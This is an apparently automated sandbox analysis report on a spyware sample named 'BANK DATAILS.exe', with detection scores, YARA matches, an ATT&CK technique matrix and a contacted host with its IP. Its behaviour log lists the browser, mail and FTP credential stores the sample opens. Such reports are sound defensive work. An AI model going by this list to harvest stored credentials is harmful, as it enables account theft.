                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.BANK DATAILS.exe.3b41a00.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK DATAILS.exe.3b41a00.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK DATAILS.exe.3a60980.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000000.285343861.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.297108286.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.512007583.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK DATAILS.exe PID: 5276, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2908, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: Yara matchFile source: 00000006.00000002.512007583.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2908, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.BANK DATAILS.exe.3b41a00.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK DATAILS.exe.3b41a00.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK DATAILS.exe.3a60980.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000000.285343861.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.297108286.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.512007583.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK DATAILS.exe PID: 5276, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2908, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation
                Path Interception11
                Process Injection
                1
                Masquerading
                2
                OS Credential Dumping
                211
                Security Software Discovery
                Remote Services1
                Email Collection
                Exfiltration Over Other Network Medium1
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Disable or Modify Tools
                1
                Credentials in Registry
                1
                Process Discovery
                Remote Desktop Protocol11
                Archive Collected Data
                Exfiltration Over Bluetooth1
                Non-Standard Port
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
                Virtualization/Sandbox Evasion
                Security Account Manager131
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares2
                Data from Local System
                Automated Exfiltration1
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer11
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Remote System Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common2
                Obfuscated Files or Information
                Cached Domain Credentials114
                System Information Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items2
                Software Packing
                DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                BANK DATAILS.exe55%VirustotalBrowse
                BANK DATAILS.exe35%ReversingLabsByteCode-MSIL.Spyware.SnakeLogger
                BANK DATAILS.exe100%Joe Sandbox ML
                No Antivirus matches
                SourceDetectionScannerLabelLinkDownload
                6.0.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                SourceDetectionScannerLabelLink
                webmail.keeprojects.in7%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://webmail.keeprojects.in0%Avira URL Cloudsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.fontbureau.comcomdms0%Avira URL Cloudsafe
                http://www.tiro.com0%URL Reputationsafe
                https://X837hbNl7u614NNf6o.net0%Avira URL Cloudsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.fontbureau.comldom0%Avira URL Cloudsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://www.fontbureau.comgrita0%URL Reputationsafe
                http://www.founder.com.cn/cn/TDhB0%Avira URL Cloudsafe
                http://www.tiro.com&Q0%Avira URL Cloudsafe
                http://tempuri.org/MyCollectionDataSet.xsd0%Avira URL Cloudsafe
                http://nhEGCU.com0%Avira URL Cloudsafe
                http://www.fontbureau.comcom0%URL Reputationsafe
                http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.fontbureau.comgrito0%URL Reputationsafe
                http://www.fontbureau.comtto0%Avira URL Cloudsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.de0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sandoll.co.krB0%Avira URL Cloudsafe
                http://www.fontbureau.comFHs0%Avira URL Cloudsafe
                http://www.fontbureau.comI.TTFds0%Avira URL Cloudsafe
                http://www.founder.com.cn/cnl-n0%URL Reputationsafe
                http://www.fontbureau.comdv0%Avira URL Cloudsafe
                http://www.fontbureau.comF0%URL Reputationsafe
                http://www.sandoll.co.krdq0%Avira URL Cloudsafe
                http://www.founder.com.c0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                http://www.tiro.comaQ0%Avira URL Cloudsafe
                http://www.fontbureau.comd0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.founder.com.cn/cn/0%URL Reputationsafe
                http://www.founder.com.cn/cn.0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.urwpp.deyq0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.fontbureau.como0%URL Reputationsafe
                http://www.fontbureau.comals0%URL Reputationsafe
                http://www.fontbureau.comede0%Avira URL Cloudsafe
                http://www.tiro.comh0%URL Reputationsafe
                http://www.tiro.comc0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                webmail.keeprojects.in
                103.195.185.58
                truetrueunknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://127.0.0.1:HTTP/1.1MSBuild.exe, 00000006.00000002.512007583.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://www.fontbureau.com/designersGBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://webmail.keeprojects.inMSBuild.exe, 00000006.00000002.517794131.0000000003383000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://www.fontbureau.com/designers/?BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.founder.com.cn/cn/bTheBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designers?BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.fontbureau.comcomdmsBANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253363943.000000000590A000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.tiro.comBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.246417212.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://X837hbNl7u614NNf6o.netMSBuild.exe, 00000006.00000002.512007583.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.fontbureau.com/designersBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.goodfont.co.krBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.comldomBANK DATAILS.exe, 00000000.00000003.287367631.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.sajatypeworks.comBANK DATAILS.exe, 00000000.00000003.245996369.0000000005923000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.245926609.0000000005922000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.245609029.0000000005923000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.typography.netDBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.founder.com.cn/cn/cTheBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.galapagosdesign.com/staff/dennis.htmBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://fontfabrik.comBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.comgritaBANK DATAILS.exe, 00000000.00000003.287367631.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.founder.com.cn/cn/TDhBBANK DATAILS.exe, 00000000.00000003.249073188.0000000005904000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.tiro.com&QBANK DATAILS.exe, 00000000.00000003.246280740.000000000591B000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.246417212.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://tempuri.org/MyCollectionDataSet.xsdBANK DATAILS.exefalse
                        • Avira URL Cloud: safe
                        unknown
